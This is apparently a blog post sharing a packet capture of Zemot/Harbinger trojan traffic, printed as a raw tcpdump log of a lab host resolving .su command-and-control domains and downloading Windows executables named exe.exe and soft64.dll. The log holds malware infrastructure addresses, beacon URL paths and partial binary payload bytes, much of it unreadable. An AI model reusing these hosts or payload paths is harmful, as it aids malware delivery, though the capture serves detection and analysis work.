Zemot/Harbinger Rootkit Trojan Downloader Loads Kuluoz/Asprox Malware PCAP Traffic Sample

By | January 29, 2016

Download Zemot/Harbinger Kuluoz Trojan Downloader PCAP : zemot.pcap

E..(..@….A…..wi..t.P…… .P….=……..
2014-08-15 09:11:05.358087 IP 172.16.204.128.49268 > 46.119.105.213.80: Flags [P.], seq 1:294, ack 1, win 64240, length 293: HTTP: GET /b/shoe/749634 HTTP/1.1
E..M..@……….wi..t.P…… .P…….GET /b/shoe/749634 HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 4.0.3219)
Host: raing-gerut.su
Cache-Control: no-cache
2014-08-15 09:11:05.358095 IP 46.119.105.213.80 > 172.16.204.128.49268: Flags [.], ack 294, win 64240, length 0
E..(V……b.wi……P.t.. …..P………….
2014-08-15 09:11:05.694537 IP 46.119.105.213.80 > 172.16.204.128.49268: Flags [P.], seq 1:149, ack 294, win 64240, length 148: HTTP: HTTP/1.1 200 OK
E…Y……B.wi……P.t.. …..P…K*..HTTP/1.1 200 OK
Server: nginx
Date: Fri, 15 Aug 2014 14:11:05 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 0
Connection: close
2014-08-15 09:11:05.695797 IP 172.16.204.128.49268 > 46.119.105.213.80: Flags [F.], seq 294, ack 149, win 64092, length 0
E..(..@….?…..wi..t.P……!&P..\……….
2014-08-15 09:11:05.695816 IP 46.119.105.213.80 > 172.16.204.128.49268: Flags [.], ack 295, win 64239, length 0
E..(Y……..wi……P.t..!&….P………….
2014-08-15 09:11:05.699398 IP 172.16.204.128.51462 > 172.16.204.2.53: 23471+ A? dients-lihuret.su. (35)
E..?……AV………..5.+^.[…………dients-lihuret.su…..
2014-08-15 09:11:05.712765 IP 46.119.105.213.80 > 172.16.204.128.49268: Flags [FP.], seq 149, ack 295, win 64239, length 0
E..(Y……..wi……P.t..!&….P….{……..
2014-08-15 09:11:05.712972 IP 172.16.204.128.49268 > 46.119.105.213.80: Flags [.], ack 150, win 64092, length 0
E..(..@….=…..wi..t.P……!’P..\……….
2014-08-15 09:11:06.045599 IP 212.38.166.26.80 > 172.16.204.128.49267: Flags [P.], seq 274730080:274731447, ack 3301971623, win 64240, length 1367: HTTP: HTTP/1.1 200 OK
E…\……#.&…….P.s.`.`….P…….HTTP/1.1 200 OK
Date: Fri, 15 Aug 2014 14:11:04 GMT
Server: Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6
X-Powered-By: PHP/5.3.3
Content-Length: 90112
Connection: close
Content-Type: text/html

kx..!…”……………^…………………………………,=.,..’.?..j.?r…>…….>……>..>…>..>bmq>….L++(B……..i…H&..H&..H&.>Cs..H&..S9..H&.~T$..H&..S ..H&..S*..H&..*!..H&..**..H&..H’.v.&.)S!..H&.BJ,..H&.p….H&…………………….nc..j.”.C..q……….-.).$..~……………………^………”…….”……..~………. ………………………………………..v…………………………………………………………………….”………………………L……..v…….w………………>…………4…….3………………^.._L……..b…….g………………^………..w………………………^..b………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………….
2014-08-15 09:11:06.046425 IP 212.38.166.26.80 > 172.16.204.128.49267: Flags [.], seq 1367:2827, ack 1, win 64240, length 1460: HTTP
E…\……..&…….P.s.`……P….)………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………….
2014-08-15 09:11:06.046448 IP 212.38.166.26.80 > 172.16.204.128.49267: Flags [P.], seq 2827:4101, ack 1, win 64240, length 1274: HTTP
E..”\……~.&…….P.s.`.k….P…………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………

2014-08-15 09:11:06.714346 IP 172.16.204.128.51462 > 172.16.204.2.53: 23471+ A? dients-lihuret.su. (35)
E..?……A…………5.+^.[…………dients-lihuret.su…..
2014-08-15 09:11:07.727996 IP 172.16.204.128.51462 > 172.16.204.2.53: 23471+ A? dients-lihuret.su. (35)
E..? …..A ………..5.+^.[…………dients-lihuret.su…..
2014-08-15 09:11:07.729685 IP 172.16.204.2.53 > 172.16.204.128.51462: 23471 13/0/0 A 178.74.212.207, A 213.111.146.59, A 46.119.141.38, A 76.71.165.162, A 178.74.226.67, A 188.190.5.162, A 109.104.165.244, A 46.98.129.84, A 91.203.89.26, A 134.249.11.2, A 93.78.67.85, A 46.211.40.28, A 66.231.16.101 (243)
E…k……6………5……[…………dients-lihuret.su………………J……………o.;………….w.&…………LG……………J.C……………………….mh……………b.T…………[.Y………………………..]NCU…………..(………….B..e
2014-08-15 09:11:07.730376 IP 172.16.204.128.49270 > 178.74.212.207.80: Flags [S], seq 3923929809, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4 .@……….J…v.P..j……. .9……………
2014-08-15 09:11:07.920077 IP 178.74.212.207.80 > 172.16.204.128.49270: Flags [S.], seq 493119538, ack 3923929810, win 64240, options [mss 1460], length 0
E..,l……j.J…….P.v.dh2..j.`….h……..
2014-08-15 09:11:07.920132 IP 172.16.204.128.49270 > 178.74.212.207.80: Flags [.], ack 1, win 64240, length 0
E..( .@….!…..J…v.P..j..dh3P….%……..
2014-08-15 09:11:07.930887 IP 172.16.204.128.49270 > 178.74.212.207.80: Flags [P.], seq 1:317, ack 1, win 64240, length 316: HTTP: GET /mod_articles-login-llget9/jquery/ HTTP/1.1
E..d .@……….J…v.P..j..dh3P…._..GET /mod_articles-login-llget9/jquery/ HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 4.0.3219)
Host: dients-lihuret.su
Cache-Control: no-cache
2014-08-15 09:11:07.930896 IP 178.74.212.207.80 > 172.16.204.128.49270: Flags [.], ack 317, win 64240, length 0
E..(l……m.J…….P.v.dh3..l.P………….
2014-08-15 09:11:08.139123 IP 178.74.212.207.80 > 172.16.204.128.49270: Flags [P.], seq 1:1368, ack 317, win 64240, length 1367: HTTP: HTTP/1.1 200 OK
E…nj…..c.J…….P.v.dh3..l.P…….HTTP/1.1 200 OK
Server: nginx
Date: Fri, 15 Aug 2014 14:12:37 GMT
Content-Type: text/plain
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.5.3-1ubuntu2.6
Content-disposition: attachment; filename=exe.exe
Pragma: no-cache

1f68
MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..
$……..Kf..*…*…*.. %U..*…5…*..`6…*…5…*…5…*…….*…….*…* .X….5…*..$,…*..Rich.*……………………..PE..L…%..S……………..`…@…….h…….p….@………………………………………………………………..~……….X………………………………………………………………….p………………………….texu….X…….Y……………… ..a.rdata…….p…….p…………..@..A.data….D…….I………………@….rsrc…Y………………………@..D………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………….

2014-08-15 09:11:12.974845 IP 172.16.204.128.49272 > 178.74.212.207.80: Flags [P.], seq 1:317, ack 1, win 64240, length 316: HTTP: GET /mod_articles-login-llget9/jquery/ HTTP/1.1
E..d S@……….J…x.PW’..%TS.P…AR..GET /mod_articles-login-llget9/jquery/ HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 4.0.3219)
Host: dients-lihuret.su
Cache-Control: no-cache
2014-08-15 09:11:12.974899 IP 178.74.212.207.80 > 172.16.204.128.49272: Flags [.], ack 317, win 64240, length 0
E..(…….t.J…….P.x%TS.W’..P…:………
2014-08-15 09:11:13.209681 IP 178.74.212.207.80 > 172.16.204.128.49272: Flags [P.], seq 1:1368, ack 317, win 64240, length 1367: HTTP: HTTP/1.1 200 OK
E….c…..j.J…….P.x%TS.W’..P…….HTTP/1.1 200 OK
Server: nginx
Date: Fri, 15 Aug 2014 14:12:42 GMT
Content-Type: text/plain
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.5.3-1ubuntu2.6
Content-disposition: attachment; filename=exe.exe
Pragma: no-cache

1f68
MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..

2014-08-15 09:14:03.628461 IP 172.16.204.128.64854 > 172.16.204.2.53: 16404+ A? dients-lihuret.su. (35)
E..?.M….I……….V.5.+F+@…………dients-lihuret.su…..
2014-08-15 09:14:04.624698 IP 172.16.204.128.64854 > 172.16.204.2.53: 16404+ A? dients-lihuret.su. (35)
E..?.R….I……….V.5.+F+@…………dients-lihuret.su…..
2014-08-15 09:14:05.327272 IP 172.16.204.2.53 > 172.16.204.128.64854: 16404 14/0/0 A 37.229.189.208, A 5.105.120.46, A 178.129.149.214, A 94.153.28.86, A 212.76.17.174, A 93.127.66.152, A 31.128.173.205, A 78.56.92.46, A 93.79.151.73, A 176.111.252.50, A 95.215.116.114, A 93.79.30.112, A 109.87.59.249, A 188.143.94.81 (259)
E…E……`………5.V….@…………dients-lihuret.su……………..%…………….ix………………………..^..V………….L…………..].B………………………..N8\………….]O.I………….o.2…………_.tr…………]O.p…………mW;……………^Q
2014-08-15 09:14:05.329188 IP 172.16.204.128.49157 > 37.229.189.208.80: Flags [S], seq 357766832, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.S@….*….%……P.S…….. ..q…………..
2014-08-15 09:14:05.442685 IP 172.16.204.2.53 > 172.16.204.128.64854: 16404 14/0/0 A 5.105.120.46, A 178.129.149.214, A 94.153.28.86, A 212.76.17.174, A 93.127.66.152, A 31.128.173.205, A 78.56.92.46, A 93.79.151.73, A 176.111.252.50, A 95.215.116.114, A 93.79.30.112, A 109.87.59.249, A 188.143.94.81, A 37.229.189.208 (259)
E…F…………….5.V….@…………dients-lihuret.su………………ix………………………..^..V………….L…………..].B………………………..N8\………….]O.I………….o.2…………_.tr…………]O.p…………mW;……………^Q…………%…
2014-08-15 09:14:05.664770 IP 37.229.189.208.80 > 172.16.204.128.49157: Flags [S.], seq 875893152, ack 357766833, win 64240, options [mss 1460], length 0
E..,HW……%……..P..45…S..`………….
2014-08-15 09:14:05.664958 IP 172.16.204.128.49157 > 37.229.189.208.80: Flags [.], ack 1, win 64240, length 0
E..(.U@….4….%……P.S..45..P…&m……..
2014-08-15 09:14:05.665104 IP 172.16.204.128.49157 > 37.229.189.208.80: Flags [P.], seq 1:222, ack 1, win 64240, length 221: HTTP: GET /mod_jshoppi-authssd5/soft64.dll HTTP/1.1
E….V@….V….%……P.S..45..P….
..GET /mod_jshoppi-authssd5/soft64.dll HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Win64; x64; Trident/6.0)
Host: dients-lihuret.su
Cache-Control: no-cache
2014-08-15 09:14:05.665109 IP 37.229.189.208.80 > 172.16.204.128.49157: Flags [.], ack 222, win 64240, length 0
E..(HX…..1%……..P..45…S..P…%………
2014-08-15 09:14:05.920418 IP 37.229.189.208.80 > 172.16.204.128.49157: Flags [P.], seq 1:1368, ack 222, win 64240, length 1367: HTTP: HTTP/1.1 200 OK
E…J……’%……..P..45…S..P….s..HTTP/1.1 200 OK
Server: nginx
Date: Fri, 15 Aug 2014 14:15:35 GMT
Content-Type: application/octet-stream
Content-Length: 175108
Last-Modified: Fri, 15 Aug 2014 08:50:44 GMT
Connection: close
ETag: “53edc9e4-2ac04″
Accept-Ranges: bytes

.o8b,..o.#…f…f99.H..5
…1[……u.P|.*…… .$..q…. .).Z..Pq.}..2.aX0s.f.[…..j..”,.k. 6…….G/*..!.x…7|…7..B….%p…3_P…..zhh/..OWe..Q.>.u…….. 70.+.9.2..G……..E..P.c..’…..!……U.~…(..m…_………/(…xF……s..iV.1.pq!U…Y.f.x|…..e..>=4..xK..[…….,.=.+*~d6..}.W.{:.gL?6#..NlL .}.j……AS.!.{2V..0..6./….].Z.Y.P.m…F…c…..|y.N@&….k..j.t…]6.Z………..p…FD1….\~..[V…f…..9i.}^….v.g..5J…^.V..:…….(.[…….H….@::..1LD …@>…..f….A.|.O.Q….LP..F?.)..q..D….Go3.2n.6….h….w……….L|ibu……..’…>…0JS..(…….l…HB…x…\1.F…U.$=p,..o@.t_…o.)…<S….g.& fF.X.0..\……..&I..J.h.C”.
=.DM……….j./…].Ih.7…7..\i..%..*3.+. .V6…p……’…E.q…7.
.OB… ..<……..@….m…u.4..N!7..i……e..[.d.{…….06…r…..A&~…^.mq.B…/N..9b,…9..}….s..s…..\>…Q.%……M…,…….N.A…=.q..c…$..+.. ..+s.Gt.l..w+……3.W.’P%R}Z. t..@~………..n..x.V..u.K.4.?……..r…Z.Z…>.g…^”%. …k..e…$………………..q…..C……..kJ…L…..&#.D k.;.;…._D.c!w;e….I..bFB,oOCP.DB.m….(..hJ.6..JM.7.)…Q.. .+
2014-08-15 09:14:06.020081 IP 37.229.189.208.80 > 172.16.204.128.49157: Flags [P.], seq 1:1368, ack 222, win 64240, length 1367: HTTP: HTTP/1.1 200 OK
E…J……M%……..P..45…S..P….s..HTTP/1.1 200 OK
Server: nginx
Date: Fri, 15 Aug 2014 14:15:35 GMT
Content-Type: application/octet-stream
Content-Length: 175108
Last-Modified: Fri, 15 Aug 2014 08:50:44 GMT
Connection: close
ETag: “53edc9e4-2ac04”
Accept-Ranges: bytes

2014-08-15 09:14:13.292765 IP 172.16.204.128.59897 > 172.16.204.2.53: 61172+ A? triple-bow.su. (31)
E..;……I9………..5.’.x…………
triple-bow.su…..
2014-08-15 09:14:14.298401 IP 172.16.204.128.59897 > 172.16.204.2.53: 61172+ A? triple-bow.su. (31)
E..;……I7………..5.’.x…………
triple-bow.su…..
2014-08-15 09:14:14.915431 IP 172.16.204.2.53 > 172.16.204.128.59897: 61172 12/0/0 A 134.249.11.2, A 141.101.28.223, A 176.111.252.50, A 46.151.243.56, A 178.204.32.63, A 176.117.78.213, A 85.198.174.37, A 67.8.236.182, A 178.74.212.207, A 119.18.74.66, A 178.137.18.149, A 37.115.14.69 (223)
E……….e………5………………
triple-bow.su…………………………….e……………o.2……………8………….. ?………….uN………….U..%…………C…………….J…………..w.JB……………………….%s.E
2014-08-15 09:14:14.921205 IP 172.16.204.128.49159 > 134.249.11.2.80: Flags [S], seq 1365434509, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@….[………..PQb…….. .R<…………..
2014-08-15 09:14:14.923071 IP 172.16.204.128.49160 > 134.249.11.2.80: Flags [S], seq 44314422, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@….Z………..P../6…… .RQ…………..
2014-08-15 09:14:15.114950 IP 134.249.11.2.80 > 172.16.204.128.49159: Flags [S.], seq 2115704189, ack 1365434510, win 64240, options [mss 1460], length 0
E..,……………..P..~..}Qb..`………….
2014-08-15 09:14:15.115089 IP 172.16.204.128.49159 > 134.249.11.2.80: Flags [.], ack 1, win 64240, length 0
E..(..@….b………..PQb..~..~P…$u……..
2014-08-15 09:14:15.115380 IP 172.16.204.128.49159 > 134.249.11.2.80: Flags [P.], seq 1:335, ack 1, win 64240, length 334: HTTP: GET /b/eve/6d35b731d8e445a0f044de3f HTTP/1.1
E..v..@…………….PQb..~..~P…….GET /b/eve/6d35b731d8e445a0f044de3f HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
Referer: http://www.google.com/
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Win64; x64; Trident/6.0)
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: triple-bow.su
Connection: Keep-Alive
2014-08-15 09:14:15.115439 IP 134.249.11.2.80 > 172.16.204.128.49159: Flags [.], ack 335, win 64240, length 0
E..(……………..P..~..~Qb..P…#’……..
2014-08-15 09:14:15.131947 IP 134.249.11.2.80 > 172.16.204.128.49160: Flags [S.], seq 934879185, ack 44314423, win 64240, options [mss 1460], length 0
E..,……………..P..7…../7`…H………
2014-08-15 09:14:15.132078 IP 172.16.204.128.49160 > 134.249.11.2.80: Flags [.], ack 1, win 64240, length 0
E..(..@….`………..P../77…P…`………
2014-08-15 09:14:15.239847 IP 172.16.204.2.53 > 172.16.204.128.59897: 61172 12/0/0 A 141.101.28.223, A 176.111.252.50, A 46.151.243.56, A 178.204.32.63, A 176.117.78.213, A 85.198.174.37, A 67.8.236.182, A 178.74.212.207, A 119.18.74.66, A 178.137.18.149, A 37.115.14.69, A 134.249.11.2 (223)
E….w……………5………………
triple-bow.su………………e……………o.2……………8………….. ?………….uN………….U..%…………C…………….J…………..w.JB……………………….%s.E…………….
2014-08-15 09:14:15.462714 IP 134.249.11.2.80 > 172.16.204.128.49159: Flags [FP.], seq 1:179, ack 335, win 64240, length 178: HTTP: HTTP/1.1 200 OK
E………………..P..~..~Qb..P…R…HTTP/1.1 200 OK
Server: nginx
Date: Fri, 15 Aug 2014 14:14:15 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 29
Connection: close

<html><body>hi!</body></html>

2014-08-15 09:15:27.993338 IP 172.16.204.128.49169 > 195.114.145.69.80: Flags [P.], seq 1:218, ack 1, win 64240, length 217: HTTP: GET /b/letr/493189686B4811B4DE99E325 HTTP/1.1
E…..@…*……r.E…P~.q6K$[.P….n..GET /b/letr/493189686B4811B4DE99E325 HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Win64; x64; Trident/6.0)
Host: triple-bow.su
Cache-Control: no-cache
2014-08-15 09:15:27.993353 IP 195.114.145.69.80 > 172.16.204.128.49169: Flags [.], ack 218, win 64240, length 0
E..(……n..r.E…..P..K$[.~.r.P………….
2014-08-15 09:15:28.270522 IP 195.114.145.69.80 > 172.16.204.128.49169: Flags [P.], seq 1:1236, ack 218, win 64240, length 1235: HTTP: HTTP/1.1 200 OK
E….0….g..r.E…..P..K$[.~.r.P…….HTTP/1.1 200 OK
Server: nginx
Date: Fri, 15 Aug 2014 14:15:28 GMT
Content-Type: application/octet-stream
Content-Length: 1083
Connection: close

2014-08-15 09:15:29.210604 IP 172.16.204.128.49171 > 31.192.209.57.8080: Flags [P.], seq 1:223, ack 1, win 64240, length 222: HTTP: GET /b/letr/AC82485B52C6EB38E71719A9 HTTP/1.1
E….
@….]…….9….3;7g{.g.P…l…GET /b/letr/AC82485B52C6EB38E71719A9 HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Win64; x64; Trident/6.0)
Host: 31.192.209.57:8080
Cache-Control: no-cache
2014-08-15 09:15:29.210638 IP 31.192.209.57.8080 > 172.16.204.128.49171: Flags [.], ack 223, win 64240, length 0
E..(…….k…9……..{.g.3;8EP….M……..
2014-08-15 09:15:29.521750 IP 31.192.209.57.8080 > 172.16.204.128.49171: Flags [P.], seq 1:1242, ack 223, win 64240, length 1241: HTTP: HTTP/1.1 200 OK
E….f………9……..{.g.3;8EP…….HTTP/1.1 200 OK
Server: nginx/1.2.2
Date: Fri, 15 Aug 2014 14:19:07 GMT
Content-Type: application/octet-stream
Content-Length: 1083
Connection: closezemot

Share Button

One thought on “Zemot/Harbinger Rootkit Trojan Downloader Loads Kuluoz/Asprox Malware PCAP Traffic Sample

  1. Pingback: Joseph de Saram#Rhodium

Leave a Reply

Your email address will not be published. Required fields are marked *